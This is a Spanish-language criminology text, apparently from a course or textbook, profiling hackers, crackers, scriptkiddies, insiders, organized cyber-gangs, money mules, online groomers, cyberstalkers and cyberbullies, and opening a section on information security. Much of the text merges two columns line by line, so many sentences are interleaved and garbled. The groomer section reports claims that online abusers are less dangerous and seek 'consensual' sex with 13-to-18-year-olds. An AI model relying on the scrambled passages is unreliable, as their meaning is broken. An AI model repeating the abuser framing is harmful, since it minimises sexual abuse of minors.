conformada por la dualidad hacker/cracker haría referencia a la figura del que también
de los años noventa que incluye a quienes se conoce como samurai informático:
utilizan las tecnologías informáticas en experto en informática (y apasionado de
el nuevo marco de la Red de Redes para Internet y las nuevas tecnologías) que
acceder ilícitamente a sistemas o redes y busca superar barreras por el mero hecho
los diferencia según su actuar sea inocuo de su existencia si bien sin entrar en el
o malicioso, hasta llegar a los hackers campo de lo delictivo, en ocasiones incluso
clandestinos de la web 2.0 y de la era de la usando sus conocimientos para la mejora
tipificación delictiva del acceso informático de la seguridad de las redes y los sistemas.
ilícito que pueden dedicarse tanto a la Para el hacker en sentido estricto, el acceso
intromisión informática, a la realización de a un sistema informático es esencialmente
ataques DoS, a la creación de webs para un reto tecnológico que mejora el propio
el fraude, al diseño de virus, a la infección sistema, un fin en sí mismo y no un medio
de bots o al envío de spam, y todo ello con para lograr algo. Esto deriva de las propias
finalidad económica (generalmente) o bien bases psicosociológicas del fenómeno:
política en el caso de los ciberhacktivistas, entre el voyeurismo, el puro entretenimiento,
y actuando de forma individualizada o la voluntad de notoriedad en el ámbito de las
formando parte de un grupo, que bien tecnologías informáticas. Tradicionalmente,
puede ser una banda organizada tradicional se ha venido asumiendo que los hackers
que opera ahora en el ciberespacio o una son personas con habilidades sociales
ciberbanda de hackers que unen sus bajas o no desarrolladas. Como ha
esfuerzos para un fin criminal común. señalado Rogers, esto es sin embargo
discutible, dado que esta afirmación
Esta primera acepción posible de hacker se suele basar a partir de la definición
es, pues, amplia y englobadora y tiene un tradicional de las habilidades sociales, esto
inequívoco significado de ilicitud: conforme es, las interacciones y comunicaciones
a la misma lo es cualquier persona con cara a cara, olvidando, sin embargo, que las
conocimientos informáticos que realiza comunicaciones online también son vida
alguna actividad ilícita, o simplemente no social. En este sentido señala el autor que los
autorizada, en el ciberespacio. La misma cibercriminales tienen una gran actividad
abarcaría, por consiguiente, todas y cada social en el ciberespacio, con normas de
una de las tipologías incluidas en las múltiples comportamiento propias (netiquette),
categorizaciones de los años noventa amistades e incluso comportamientos
que distinguían entre hackers, crackers, prosociales como el tutorizar a los nuevos
phreakers y pirates, o entre pranksters, a entender la tecnología y el software,
hackers, malicious hackers, personal etcétera.
problema solvers, career criminals, extreme
advocates y otros , también en aquellas A todos estos rasgos psicológicos se suele
otras taxonomías más recientes que añadir cierta suma de ideas que, según
diferencian entre scriptkiddies, cyberpunks, algunos, conjugan una «ética del hacker»,
hacktivists, virus writers y professionals; y a entre las que destaca la comprensión de la
las cuales podrían sumarse muchas otras Red como un lugar sin barreras en el que
(spammers, snoopers, spoofers, sniffers), todo el mundo debe poder acceder a todo
correspondientes a cada una de las nuevas para «poner en común la información»; el
hacker se ve a sí mismo como un mago

de la programación y de la cultura virtual, gracias a su conocimiento informático, es
como los auténticos constructores de que los crackers obtienen sus beneficios
Internet, los que hacen que funcione. de la actividad ilícita que desarrollan en
Internet.
Esta visión algo idílica del hacker está
en peligro debido a que cada vez más El término cracker comenzó a ser utilizado
se está restringiendo su ámbito de por los propios hackers para referirse a
actuación en el marco de lo lícito. Como quienes utilizaban el acceso informático
se verá posteriormente para el análisis para robar información relevante o causar
del hacking, su consideración como delito algún otro tipo de daño, y diferenciarlos
puede llevar a la desaparición del hacker así de quienes superaban las barreras de
puro, cuanto menos en lo que respecta a acceso por el mero hecho de hacerlo. Estos
la intromisión en sistemas informáticos, son los crackers, cuya principal diferencia
puesto que desde el momento en que la con los hackers, no es tanto su capacitación
misma, independientemente del fin con informática que se supone inferior a la de los
el que se lleve a cabo, resulte delictiva, la hackers, pero puede llegar a no serlo, como
diferenciación entre hacker y cracker a la finalidad delictiva o, en otros términos,
efectos del acceso carecerá de sentido. la diferencia entre construir cosas y
Ésta es una de las causas de que en las destruirlas. Aunque la frontera entre hackers
últimas décadas se haya pasado de una y crackers es tan estrecha que algunos
idílica visión del hacker, de su visión de de ellos la traspasan de forma constante,
héroes que les atribuye Stephen Levy, pasando de actividades lícitas a ilícitas y
a una criminalización de los mismos, a utilizando para ello nicks distintos. Muchos
su categorización como cibervillanos crackers son hackers que no encuentran
por parte de la sociedad, que los asocia una salida profesional o económica a
inmediatamente al cibercrimen. De la su actividad y que la logran en el terreno
edad de oro hacker, se ha pasado a una de la ilegalidad. Son muchos los crackers
época en la que se les ha demonizado, que actúan en solitario que son captados
lo que ha incluido significativamente (o instruidos) por las mafias organizadas
en la caracterización del hacker que, para sus actividades en el ciberespacio,
en los últimos años, o bien se convierte pero empieza a ser también habitual que
definitivamente en cracker, o bien centra los propios crackers conformen grupos,
sus actividades en el desarrollo de software generalmente pequeños, aunque también
abierto y otros proyectos como creative hay otros transnacionales, dedicados
commons que se corresponden con sus específicamente a la cibercriminalidad.
principios éticos, e incluso se resitúa en el Éstos son los cibergrupos o ciberbandas
nuevo marco legal gracias a la explosión organizadas sobre las que se tratará
de las empresas tecnológicas, que están después.
atentas a cualquier actividad innovadora
en Internet para hacer propuestas a los En la actualidad, gran parte de los hackers-
mejores hackers e integrarles en el mundo crackers ya no son expertos informáticos,
empresarial. Hoy el hacker, pues, no sólo sino que también comienzan a realizar
es el informático altruista que explora tales actividades usuarios, generalmente
las barreras de redes y sistemas, sino jóvenes, con conocimientos básicos de
que también es el informático que utiliza informática que aprovechan programas
Internet como campo de pruebas con la y aplicaciones sencillas para realizar sus
finalidad de obtener beneficio económico incursiones. Éstos son los denominados
de su actividad. A éste lo único que le scriptkiddies pues, aunque algunos actúan
diferencia de otros expertos informáticos para lograr notoriedad, normalmente sus
que exploran los sistemas y las redes, actividades no buscan crear y explorar,
acceden a ellas y cambian sus protocolos sino aprovechar vulnerabilidades y dañar.
Los scriptkiddies son un fenómeno nuevo

derivado de la popularización de Internet y de los propios conocimientos informáticos,
que hace que sean muchos los que se animen a ser hackers pese a no disponer siempre
de los conocimientos necesarios para ello. En todo caso, la de por sí naturaleza insegura
de Internet hace que con unos mínimos conocimientos informáticos puedan ponerse
en riesgo el patrimonio o la intimidad de innumerables personas, de forma que han
aparecido todo un conjunto de sujetos que pueden realizar graves infracciones con
importantes daños, sin tener unos conocimientos informáticos superiores al nivel de
usuario, ni presentar especiales problemas de adaptación social. Los scriptkiddies son,
pues, jóvenes que, no siendo expertos hackers capaces de acceder a sistemas mediante
programaciones propias, realizan sus ataques informáticos, generalmente eligiendo
las víctimas al azar, aprovechando programas y scripts básicos y causando daños en
muchos casos más fruto de su impericia o de la dañosidad del malware utilizado, que de
sus habilidades. Los scriptkiddies no suelen, pues, realizar hacking al uso, sino que más
bien se les relaciona con ataques de DoS y similares, pero también son reclutados por las
bandas organizadas para la ejecución de sus ataques en Internet.
4.2. Cibercriminal económico

Aunque, como hemos visto anteriormente, no son los ataques realizados con ánimo
de obtener un lucro patrimonial los únicos crímenes que se realizan en el ciberespacio
siguen siendo con esta cibercriminalidad económica con la que se identifica el fenómeno
del cibercrimen y al hacker en general. En el fondo esta percepción no está nada lejos
de la realidad. La mayoría de los crímenes en el ciberespacio se realizan con intención
económica, y ésa es con la que actúan la mayoría de los hackers (en este caso crackers)
que ejecutan ataques de muchos tipos.
Los hackers económicos buscan vulnerabilidades, superan barreras en sistemas o en redes
bien sean para el acceso a un sistema, para la configuración de una red telemática, o de
cualquier otro tipo, interrumpen y saturan servidores y sistemas, o diseñan herramientas
específicas con la intención final de obtener por su actividad un beneficio económico
directo o indirecto en el caso de que sean hackers contratados por grupos organizados.
Así son hackers económicos aquellos que desarrollan virus y demás modalidades de
malware, generalmente como forma de potenciar vulnerabilidades en los sistemas
informáticos o de crear backdoors para poder acceder a redes o sistemas; también lo
son los denominados information warriors que obtienen información y la transmiten al
grupo organizado del que forman parte o a otros a cambio de dinero; y también los
meros ladrones, que utilizan burdos engaños o técnicas más sofsticadas para hacerse
con la información bancaria que después les permite acceder al dinero por medio de la
banca online.
No sólo los hackers individuales y con conocimientos informáticos protagonizan los
cibercrímenes económicos. En la actualidad, los principales actores de tales delitos son
las bandas organizadas para las que trabajan los propios hackers, y con ellos operan
también como colaboradores insiders y mulas sin las que no sería posible el éxito de la
cibercriminalidad.
HACKERS, INSIDERS Y GRUPOS ORGANIZADOS

Otro de los cibercriminales clásicos es el insider que pertenece o trabaja para la
institución o empresa víctima de la infracción. Este último es precisamente uno de los

principales protagonistas de los data realizada por el inadaptado hacker a
breaches o filtraciones de datos, aunque convertirse en un crimen cometido por el
la evolución de las TIC ha cambiado en crimen organizado a nivel transnacional
algo la caracterización del ciberviolador de y con una potencial lesividad de enormes
datos. En efecto, y tal y como pusieron de dimensiones. Y es que cada vez destaca
manifesto, entre otros, en los años setenta más la interrelación entre cibercriminalidad
y ochenta, Ullrich Sieber en Alemania y y delincuencia organizada. Bien sea por
Romeo Casabona en España, la gran la tendencia general, destacada entre
mayoría de las violaciones informáticas de otros por Terradillos Basoco, a la aparición
datos en la empresa eran llevadas a cabo y proliferación de manifestaciones
por empleados de las empresas víctima del criminales de alcance transnacional, las
ataque. La popularización y mundialización cuales ya no se ocupan sólo de los delitos
de la Red ha cambiado, sin embargo, esta de tráfico de drogas, blanqueo de dinero
proporción de sujetos protagonistas de los fruto de actividades ilícitas, el tráfico de
ataques, en el sentido de que, conforme armas, etc., sino de cualesquiera otras
indica el informe Verizon, hoy en el 70% de actividades criminales que puedan ser
las violaciones de datos intervienen sujetos lucrativas porque el propio uso de las TIC
que no tienen ninguna relación con la ha sido según todos los indicios una de las
empresa frente al 48% de casos en los que causas del éxito y expansión del crimen
interviene un insider. Aun así, casi la mitad global, o por la unión de estos factores a las
de los ataques de este tipo son realizados especiales características del ciberespacio
con deslealtad, por lo que no se trata de anteriormente señaladas, muy
que haya disminuido el número de sujetos particularmente su carácter transnacional,
que aprovecha su condición en la empresa mundial, desregularizado y con tendencia
para violar los datos de su entidad, sino al anonimato, que lo convierten en un
que ha aumentado exponencialmente ámbito de oportunidad de lucro económico
el número de sujetos externos que puede como no lo ha tenido nunca la criminalidad
violar tal tipo de información. Además, y organizada y con escaso riesgo para la
como han señalado Pinguelo y Muller, si detención policial, lo cierto es que hoy las
bien los ataques de los insiders no son TIC son una de las principales herramientas
tan frecuentes como los externos, la tasa del crimen organizado, que es, por tanto,
de éxito de los primeros puede ser mucho un importante sujeto activo de los delitos
mayor, dado que es más posible que pasen cometidos en el ciberespacio.
desapercibidos y suponen un riesgo, por
el mayor acceso a la información, mucho En realidad, como ha señalado Williams,
mayor que los ataques externos. al igual que han hecho muchas empresas
que han tenido que «trasladarse» al
En todo caso hoy no puede afirmarse, ciberespacio para realizar sus actividades
como se hace por algún autor, que la económicas, las «empresas criminales»,
caracterización general del sujeto activo de con similar filosofía, están aprovechando
los delitos informáticos (que en gran parte las oportunidades del medio para
coincide con la cibercriminalidad como se continuar con sus actividades criminales.
explicó anteriormente) sea el insider. Eso ya En otras palabras: el ciberespacio es para
no es así ni siquiera para los data breaches. los grupos y bandas organizadas el área
Más bien los estudios empíricos actuales de desarrollo emergente más importante
confirman que los ataques externos son del siglo XXI. Esto deriva tanto de las
la gran mayoría y que los mismos vienen múltiples actividades ilícitas muy lucrativas
protagonizados por grupos organizados de que pueden llevar a cabo las bandas
cibercriminales. organizadas en el espacio virtual, de la
facilidad para el anonimato que seducen
En efecto, hoy puede decirse que el significativamente a los grupos criminales,
cibercrimen ha pasado de ser una infracción

como de las propias mejoras que el uso para la persecución de estas infracciones,
de las TIC conlleva para la realización de entenderemos lo cómodas que están las
actividades criminales tradicionales, como organizaciones criminales en el nuevo
muy especialmente de las características espacio virtual universal.
del ciberespacio de transnacionalidad.
Dentro de este fenómeno de unión
En cuanto a esto último, y como ha señalado entre cibercriminalidad y delincuencia
Choo, son múltiples las pruebas que organizada, hay que diferenciar, sin
demuestran que las bandas organizadas embargo, entre las organizaciones
se han aprovechado de las TIC para facilitar tradicionales (mafia siciliana, mafias rusas,
o mejorar la comisión de delitos, para tríadas chinas o yakuzas, etc.) que suman
identificar nuevas oportunidades o para a sus múltiples actividades la realización
luchar contra las medidas policiales de los de delitos por medio de Internet, y aquellas
Estados destinadas a evitar sus actividades. otras ciberbandas organizadas o conjunto
Estos grupos se han adaptado a los cambios de crackers que se organizan como grupo
tecnológicos y han aprovechado las TIC criminal y cuyo único ámbito de actuación
para facilitar sus lucrativas actividades es el ciberespacio.
criminales en el espacio físico tales como
el narcotráfico, la trata de personas, Las primeras, los grupos organizados
etcétera. Pero, además, el ciberespacio clásicos operando en Internet, comenzaron
se ha convertido en un nuevo ámbito de su relación con el ciberespacio en
actividad de las organizaciones criminales. ámbitos muy específicos de transmisión
El ciberespacio ofrece a las organizaciones de contenido como la pornografía
criminales clásicas unas posibilidades infantil o la piratería intelectual a través
de expansión de sus actividades a otros de la distribución callejera de archivos y
Estados y a otras víctimas que serían mediante la explotación de inmigrantes
prácticamente imposibles en «el mundo para la ejecución de los hechos, pero
real», por lo que a las citadas actividades pasaron pronto a ampliar sus actividades
delictivas tradicionales se unen ahora otras criminales al ámbito de la defraudación
como el tráfico de secretos empresariales bancaria interviniendo en fraudes de
obtenidos por Internet, la extorsión y los tarjetas de crédito. En la actualidad, la
ciberfraudes, el blanqueo de dinero a través intervención de la criminalidad organizada
de sistemas de pago online, la distribución en el ciberespacio abarca, como se
ilegal de materiales a través de Internet y el ha dicho, prácticamente todas las
uso de Internet como un mercado de venta formas de comportamiento delictivo en
ilegal de productos falsificados y drogas Internet (si quitamos conductas como el
farmacéuticas. ciberbullying, el child grooming o similares),
si bien centrándose especialmente en
Resulta lógica la expansión de las actividades las distintas formas de fraude, por ser
de las bandas criminales organizadas al las más beneficiosas económicamente.
ciberespacio. Hay que tener en cuenta que Generalmente las formas más burdas de
la transparencia y el secretismo son valores phishing y de ataques scam, provienen de
importantes para el desarrollo estratégico mafias y bandas organizadas clásicas que
de las organizaciones criminales, por lo que comienzan a actuar en el ciberespacio,
el mayor anonimato que Internet garantiza a las cuales hay que sumar el skimming,
a las acciones delictivas llevadas a cabo en conducta que no es propiamente un
él desde cibercafés, locutorios telemáticos ciberataque. Su evolución, sin embargo,
o por otros medios más sofisticados como es imparable hacia el aumento de la
la infección de bots, ofrece a las bandas sofisticación de los ataques: por medio del
criminales una seguridad mayor que la reclutamiento de hackers e incluso de la
que puede tener en «el mundo real». Si a financiación de sus estudios para la mejora
ello sumamos, por último, las dificultades de sus conocimientos; todo lo cual hace

que hoy se haya identificado la presencia jerarquías son verticales, concentradas y
de bandas organizadas en la ejecución de tienden a ser rígidas y fijas; de forma que
casi cualquier tipo de ciberataque desde el las estructuras organizativas jerárquicas
spam, infección de bot, spoofng e identity no son ni necesarias ni apropiadas
theft y envío de malware, entre otros. para las actividades realizadas en el
ciberespacio. Esta idea de la estructura
Como se ha señalado anteriormente, horizontal, casi difusa, de las ciberbandas
además de la interconexión entre bandas criminales concuerda con una de las
organizadas tradicionales y el cibercrimen, características más particulares que se
existen en la actualidad grupos de hackers atribuyen a estas organizaciones delictivas:
que actúan como cibercriminales de el que habitualmente los miembros de las
forma organizada. Pese a que se señaló mismas no tienen entre sí ningún tipo de
por parte de algunos autores la dificultad contacto físico directo, sino que sólo se
de que el crimen organizado con su conocen a través de Internet, en ocasiones
estructura jerarquizada tuviera éxito desconociendo incluso la identidad real del
en el ciberespacio, y aunque se hayan sujeto y teniendo como única referencia
presentado generalmente los hackers algún tipo de pseudónimo, nick o nombre
como personas aisladas socialmente que clave. Al fin y al cabo, esto es perfectamente
se recluyen del mundo real, la realidad coherente con la naturaleza y posibilidades
actual es que existen bandas organizadas que ofrece el ciberespacio: la conjunción
de hackers (en este caso se podría hablar de personas situadas en lugares distantes
de crackers) y que los mejores de ellos entre sí, pero unidas por ideas afines y/o por
están activamente involucrados en grupos idénticos propósitos, para lo cual colaboran
de este tipo. Ya sea intercambiando opinión por medio de una estructura de organización
e información, suministrándose unos a de trabajo conjunto. Aunque no es fácil la
otros apoyo, o más allá de ello, preparando constatación de tal forma de estructuración
ataques conjuntos en los que se dividen los del grupo debido a la dificultad que plantea
roles y las funciones para lograr un objetivo el enjuiciamiento del cibercrimen, Choo
común, cada vez es más frecuente la aporta varios ejemplos de esta modalidad
colaboración entre cibercriminales, algunos de ciberbandas como la del grupo
de los cuales acaban formando grupos clandestino Shadowcrew que llegó a la
dedicados a la realización de actividades defraudación online de más de 1,7 millones
ilícitas. La literatura especializada señala de tarjetas de crédito. Junto con los insiders
que la forma de organización de los y los grupos organizados, y especialmente
grupos criminales cuando operan en el relacionados con éstos, otros intervinientes
ciberespacio no es la misma que la de las relevantes en la cibercriminalidad son
organizaciones tradicionales con las que, las mulas. Tanto los grupos tradicionales
por otra parte, muchas veces se relacionan. que actúan en el ciberespacio como los
Más bien se trata en el caso de las primeras cibergrupos organizados se sirven para
de estructuras descentralizadas y flexibles la realización de sus actividades de las
formadas por miembros de gran variedad denominadas cibermulas. En realidad, las
de países, que no tienen por qué funcionar cibermulas no son, desde una perspectiva
con estructura jerarquizada, sino que los criminológica, cibercriminales, puesto que
miembros pueden actuar conjuntamente, no son autores del delito en el ciberespacio
pero con cierta independencia e incluso sino colaboradores o recolectores de los
manteniendo el anonimato. Al fin y al cabo, beneficios en Internet que luego envían por
y como señala Brenner, la propia naturaleza medios seguros de transmisión el dinero a
del ciberespacio viene a ser incompatible los autores del delito (las ciberbandas) o a
con la jerarquía: el ciberespacio es una los responsables de los grupos organizados
red de redes laterales que es difusa, tradicionales que operan en Internet. Las
fluida y en evolución, mientras que las cibermulas son reclutadas por Internet

bajo la promesa de la recepción de 4.3. El cibercriminal
importantes cantidades de dinero que
tienen que transmitir quedándose un tanto social
por cien como ganancia. Generalmente Es esta categoría la que incluye una
estas cibermulas son las únicas detenidas más variada tipología de motivaciones
por estos delitos y pueden ser hechas criminales, que pueden ir desde quien
responsables de los mismos como actúa con un propósito sexual, que bien
cooperadores necesarios o cómplices. En puede ser un mayor de edad con ánimo de
los últimos tiempos está apareciendo un abusar de un niño, niña o adolescente que
nuevo tipo de mula en el que el engaño es envía fotos de un desnudo propio a otra
algo más elaborado. Se trata del reshipper persona, pasando por quien muestra su
o reenviador, que se diferencia de la mula agresividad en el ciberespacio insultando
en que ya no envía cantidades de dinero a y amenazando a otras personas en foros o
través de Western Union o MoneyGram, sino en redes sociales, hasta quien acosa a otra
que envía paquetes de bienes comprados persona enviándole numerosos mensajes
por Internet por medio de cuentas de e-mail o utilizando las redes sociales y ello
corrientes ajenas a las que se ha accedido pese a la insistencia de la víctima en que la
por medio de phishing. Debido a que las deje en paz. Y también los menores podrán
mulas cada vez son más conscientes del ser, por tanto, autores de cibercrímenes
riesgo y, por tanto, se reduce su número, sociales, especialmente de aquellos
las mafias organizadas que operan en cometidos en el seno de redes sociales y
el ciberespacio y ciberbandas optan otros lugares de intercomunicación social
por comprar bienes y enviarlos fuera de en el ciberespacio. Así, los NNAs serán
Estados Unidos, para lo cual necesitan un protagonistas como sujetos activos de
ciudadano americano que realice el envío. delitos tales como el sexting, las injurias
Este nuevo tipo de mula o reenviador es y calumnias vertidas en foros o similares,
reclutado del mismo modo que las mulas, así como del cyberbullying o acoso a
por medio de ofertas de empleo en las que NNAs en el que las redes sociales pueden
se promete un sueldo a cambio de reenviar convertirse en un instrumento más de
paquetes bajo argumentos variados. En acoso a la víctima.
ocasiones, incluso, según ha recogido
el IC3, se llegan a entrabar aparentes En realidad, pues, hay tantos potenciales
relaciones sentimentales con la víctima perfiles de autores de cibercrímenes
y, con la excusa de que el enamorado sociales como modalidades delictivas
no puede recibir sus paquetes al estar existentes, y las únicas características
fuera de Estados Unidos, le empiezan a atribuibles a cada una de esas categorías
llegar paquetes al reshipper que, cuando de sujetos serán, en principio, similares a las
pregunta y se da cuenta del engaño, que se puedan atribuir a los que cometen
deja de recibirlos. Por último, y siguiendo los mismos delitos en el espacio físico. Lo
la acertada clasificación de Choo, a realmente interesante es, sin embargo,
los grupos organizados tradicionales analizar cómo el ciberespacio, al modificar
que utilizan el ciberespacio para la el ámbito de riesgo en el que se comete el
comisión de nuevos delitos, y las nuevas delito, también cambia en muchos casos
ciberbandas que operan específicamente el perfil de quien lo comete.
en el ciberespacio, habría que sumar un
tercer tipo, el de los grupos organizados
motivados política o ideológicamente que
utilizan las TIC para facilitar sus objetivos EL GROOMER
criminales. Estudios psicológicos y criminológicos
certifican que el ciberespacio aumenta
las posibilidades de que potenciales

abusadores sexuales lleguen a serlo. Así se concluye, por ejemplo, de un estudio de
Young que señala, entre otros factores, la relación existente entre el aislamiento social y la
existencia de una sexualidad compulsiva o adictiva. Internet, en este sentido, es un vehículo
utilizado por muchos sujetos para vencer el aislamiento social y comunicarse con otros.
En segundo lugar, Internet aumenta el número potencial de víctimas a las que puede
acceder un agresor. Además, Internet permite que el agresor realice una investigación del
perfil de víctima antes de decidir quién puede ser más vulnerable al ataque. Por último,
Internet difumina la percepción del potencial abusador del riesgo a ser descubierto.
Como señala Young respecto a los ataques sexuales, mientras que los mismos «pueden
parecer un viaje a un “territorio desconocido”, las conductas sexuales online las ejecuta el
agresor en el ambiente familiar y cómodo de casa o la oficina, lo que reduce la sensación
de riesgo y permite incluso los comportamientos más aventureros». Se trata, eso sí, de un
anonimato que sirve al sujeto para potenciar su sensación de seguridad y decidirse a
atacar, pero no para utilizarlo falseando su identidad y haciéndose pasar por NNA.
Esto, obviamente, incide en el cambio del perfil del cybergroomer frente al groomer que
operaba en el espacio físico tradicional. Los estudios de perfilación criminológico de los
ciberdepredadores sexuales aseguran que el perfil del agresor en el ciberespacio es
significativamente distinto, e incluso desde una perspectiva preventiva-especial, menos
peligroso, que el del abusador sexual clásico o tradicional. Mientras que el depredador
tradicional suele llevar a cabo sus ataques contra niños como forma de autogratificación,
debido a una necesidad de ejercer poder, dominio, control o rabia, sin ser consciente
en ningún momento del daño infligido, el ciberabusador que realiza grooming en los
chats deriva sus fantasías sexuales de los desórdenes psicológicos motivados por la
necesidad de escapar de la soledad, de la dificultad de las relaciones personales, de su
baja autoestima, por lo que sí es consciente del significado de su conducta y del daño
que puede infligir. Siguiendo el modelo comparativo de los perfiles del ciberpredador
frente al clásico de Young, se puede afirmar que mientras que este último es un depurado
manipulador que oculta sus intenciones e incluso su identidad hasta que está en
disposición de llevar a cabo el ataque, el sujeto que realiza grooming a través de Internet
muchas veces no tiene una intención real de llevar a cabo sus fantasías, sino que las
hace públicas generalmente de forma descarada, sin importarle que otros miembros del
chat puedan sentirse ofendidos, reconociendo en la gran mayoría de los casos que se
trata de varones de edad avanzada con deseos de realizar fantasías sexuales con NNAs,
etc.. Y este perfil de los sujetos que utilizan Internet para molestar a NNAs, también es
confirmado por Wolak, Finkelhor, Mitchell e Ybarra, quienes afirman que los sujetos que se
dedican a molestar a NNAs en Internet ocupan un margen estrecho dentro del espectro
de los delincuentes sexuales, excluyendo claramente a los pedófilos y a los agresores
violentos o sádicos. Esto quedaría confirmado por la comparación psicológica entre
los agresores sexuales clásicos y los agresores online, que tienen mayor empatía con
las víctimas, menor índice de desviación sexual y menos distorsiones cognitivas que los
primeros.
Podría afirmarse, conforme a estos estudios, que el sujeto que utiliza Internet para molestar
y hacer proposiciones a NNAs no es generalmente un pedófilo, dado que sus objetivos son
adolescentes, en general, y chicas que ya hayan tenido experiencias sexuales y que estén
dispuestas a tenerlas, en particular. El objetivo, pues, de los ciberabusadores sexuales,
no es tanto el abusar de NNAs de trece años, como el mantener relaciones sexuales
consentidas con NNAs de edad de trece a dieciocho años.
Lo cierto es que no parece posible afirmar que cualitativamente el riesgo de este tipo
de cibergrooming sea mayor al tradicional, en el sentido de que es discutible, conforme

a los estudios que hemos visto, que tener un nivel alto de manejo de las
pueda decirse que hay más riesgo de tecnologías y usa una amplia gama de
un abuso sexual en el caso de un adulto métodos para acosar a sus víctimas como
que realiza proposiciones sexuales en un el envío de correos masivos, el envío de
chat a una chica de quince años que se troyanos, el robo de identidad, etc. Los
muestra aparentemente desinhibida en autores comentan que existe la posibilidad
temáticas sexuales, que en el caso de un de que los cyberstalkers vengativos
adulto que se acerca a un niño de once presenten algún tipo de enfermedad
años para convertirse en su confidente mental a raíz del análisis de los mensajes
con la intención de intentar estar sólo que enviaron a sus víctimas.
con él en algún momento y llegando a
concretar una cita en su casa. Los estudios Siguiendo la tipología propuesta por Bocij y
criminológicos indican que el agresor en McFarlen, el cyberstalker de tipo integrado
línea tiene un mayor autocontrol y una tiene como objetivo molestar e irritar a sus
menor impulsividad que el agresor que no víctimas sin intención de mantener algún
utiliza Internet tipo de relación sentimental con ellas.
Presentan un nivel alto de manejo de Internet
y, a diferencia con el cyberstalker de tipo
vengativo, no suelen tener antecedentes
EL CYBERSTALKER delictivos ni presentar historial psiquiátrico
previo. La tercera categoría propuesta, los
Del estudio de Bocij y McFarlen se denominados cyberstalkers íntimos, tienen
desprende que los cyberstalkers suelen como objetivo establecer una relación
ser hombres (84,6% de los hombres frente íntima con sus víctimas y el medio que
a 15,4% de mujeres) con una edad media suelen emplear para contactar con ellas
de 41 años, aunque el rango de edad es el correo electrónico y las webs de
puede variar de 18 a 67 años. Respecto al citas. El nivel de manejo de Internet de este
estado civil de los agresores, la mayoría tipo de cyberstalkers varía desde el que
suelen ser solteros (52,3%) aunque también apenas tiene conocimientos hasta el que
se pueden dar en menor medida casos tiene conocimientos altos. Y, finalmente,
de agresores casados (21,7%) o que se refieren con cyberstalkers colectivos a
estén separados o divorciados (17,3%). cuando dos o más personas se unen para
Suelen tener conocimientos informáticos, acosar a una misma víctima a través de
habiendo obtenido los autores del estudio medios tecnológicos. Este tipo de agresores
que el 41% poseía conocimientos medios se caracterizan por tener conocimientos
y un 50% conocimientos altos o muy altos. amplios de informática y de emplear
Finalmente, respecto a la ocupación laboral, técnicas muy variadas para acosar a sus
obtuvieron que un 50% de los cyberstalkers víctimas.
tenían trabajo frente a un 18,2% que se
encontraban en paro y un 8,3% que era
estudiante.
EL CYBERBULLY
En el mismo estudio, Bocij y McFarle,
elaboraron una clasificación de Existen dos modalidades de cyberbully o los
cyberstalkers distinguiendo cuatro tipos: cyberbullies, según Mason: los proactivos,
el vengativo (vindicative), el integrado que cometen su acción para conseguir
(composed), el íntimo (intimate) y el un fin, y los reactivos, que agreden como
colectivo (collective). De acuerdo con respuesta a una provocación, agresión o
la clasificación, el cyberstalker de tipo amenaza. Respecto al número, de nuevo
vengativo se correspondería con el tipo el porcentaje de agresores varía entre
más violento que generalmente presenta estudios, desde el 0,4% de los encuestados
antecedentes delictivos. Además, suele hasta el 52%, aunque la mayoría sitúan

la prevalencia entre el 4 y el 18% de los hacer uso de él en dependencias poco
alumnos estudiados. Las discrepancias vigiladas y tener conocimientos específicos
encontradas se pueden deber a las sobre las TIC.
diferencias culturales de los encuestados
o, en mayor medida, a la metodología
empleada, sobre todo teniendo en cuenta
que cada uno mide un rango de edad y
no coinciden las conductas medidas ni la
temporalidad.
Respecto al sexo de los ciberagresores la
mayoría de los estudios indican que son del
sexo masculino quienes más involucrados
están en este tipo de conductas. Aunque
otros como Patchin e Hinduja no han
encontrado diferencias signifcativas
entre masculino (18%) y femenino (16%). O
incluso resultados opuestos como Ybarra y
Mitchell, quienes obtuvieron que eran más
agresoras las del género femenino.
En cuanto a la edad, tampoco existe
un consenso en si puede ser un factor
determinante en la victimización. No
obstante, los cursos en los que más casos
de cyberbullying se registran son en
segundo y tercero de secundaria como
ocurre con el bullying tradicional.
Otras características que también se
han replicado en el cyberbullying es el
referido a la autoestima de los agresores.
Así, Calmaestre apunta que tienen una
autoestima más elevada que las víctimas
como ya apuntaba Olweus en el caso del
bullying tradicional donde además de
no presentar problemas de autoestima,
siente una fuerte necesidad de dominar y
someter a otros estudiantes, son impulsivos
e iracundos, carecen de empatía, suelen
ser desafiantes y agresivos con los adultos
incluidos los padres y los profesores y
suelen presentar otro tipo de conductas
antisociales, como el vandalismo.
Finalmente merece la pena destacar que,
como han comentado Walware y Wannes,
existen determinados factores que pueden
potenciar cometer cyberbullying. Entre
ellos se encuentran tener una percepción
favorable sobre este tipo de conductas,
ser usuarios frecuentes de Internet, tener
acceso a una computadora privada y

CIBER
SEGURIDAD

1. La seguridad de la
información
1.1. La seguridad de la información implica
confidencialidad, integridad y disponibilidad
Hablar de seguridad de información es mucho más que tratar sobre cómo configurar
firewalls, aplicar parches para corregir nuevas vulnerabilidades en el sistema operativo o
guardar de forma cuidadosa los backups.
La seguridad de la información implica determinar qué hay que proteger y

por qué, de qué se debe proteger y cómo protegerlo.
Los términos seguridad de la información y seguridad informática se utilizan con frecuencia

como sinónimos, aunque no describen exactamente lo mismo. En general, la seguridad
de la información (information security) hace referencia a la confidencialidad, integridad
y disponibilidad de la información, independientemente del medio en que se almacenen
los datos.
La información se almacena en diferentes soportes, pueden ser electrónicos, impresos
o de otro tipo. Por otro lado, la seguridad de la información implica la implementación
de estrategias que cubran los procesos de la organización en los cuales la información
es el activo primordial. En contraposición, «seguridad informática» es un concepto más
restrictivo que caracteriza la seguridad técnica de los sistemas informáticos.
• Un sistema informático seguro puede incluir técnicas sofisticadas de
criptografía, detección de intrusos y seguimiento de la actividad interna. No
obstante, la simple negligencia de un empleado relativa a la política de claves
de seguridad puede permitir el acceso a un intruso. Es importante entender
que un sistema de seguridad incluye también a personas y procedimientos
más allá de los sistemas informáticos en sí. En palabras de Bruce Schneier,
«si piensas que la tecnología puede solucionar tus problemas de seguridad,
eso quiere decir que no comprendes los problemas y que no comprendes la
tecnología».
Hay tres perspectivas fundamentales en la seguridad de la información:
• Legal

• Técnica
• Organizativa
El punto de vista legal concierne a las regulaciones internacionales, nacionales y regionales
que protegen básicamente la privacidad y los derechos de propiedad intelectual.
La perspectiva técnica es la del desarrollo, análisis, configuración y despliegue de
elementos técnicos (hardware, software, redes) que tiene determinadas características
relacionadas con la seguridad.
